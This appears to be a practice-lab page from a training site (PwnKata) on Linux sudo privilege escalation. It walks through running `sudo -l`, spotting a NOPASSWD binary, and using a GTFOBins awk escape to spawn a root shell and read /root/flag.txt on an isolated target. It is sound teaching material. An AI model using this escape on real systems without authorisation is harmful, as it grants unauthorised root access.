sudo -l Privilege Escalation
A misconfigured sudo rule is one of the most common real-world Linux privesc paths. Drill it until `sudo -l` is the first thing your fingers type.
You start as an unprivileged user on a real Linux box in your browser. Run `sudo -l`, spot the NOPASSWD binary, and abuse it with the matching GTFOBins technique to execute as root and read the flag.
Every rep reseeds the box — a different binary (find, awk, env, python3, perl) and target each time — so you practice the recognition, not a memorized command. Solve it and a fresh variant spins up instantly.
How the attack works
- Enumerate what your user is allowed to run as another user.
sudo -l - Spot the NOPASSWD entry — a binary you can run as root without a password.
- Look the binary up on GTFOBins for its sudo escape, then execute it to drop a root shell.
sudo awk 'BEGIN {system("/bin/sh")}' - Confirm you are root and read the protected flag.
id && cat /root/flag.txt
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
What you'll practice
Sourced from
sudo -l Privilege Escalation
A misconfigured sudo rule is one of the most common real-world Linux privesc paths. Drill it until `sudo -l` is the first thing your fingers type.
Recover the flag at /root/flag.txt and submit it.
Drill this now
Spin up a live isolated target and start practicing in seconds — free.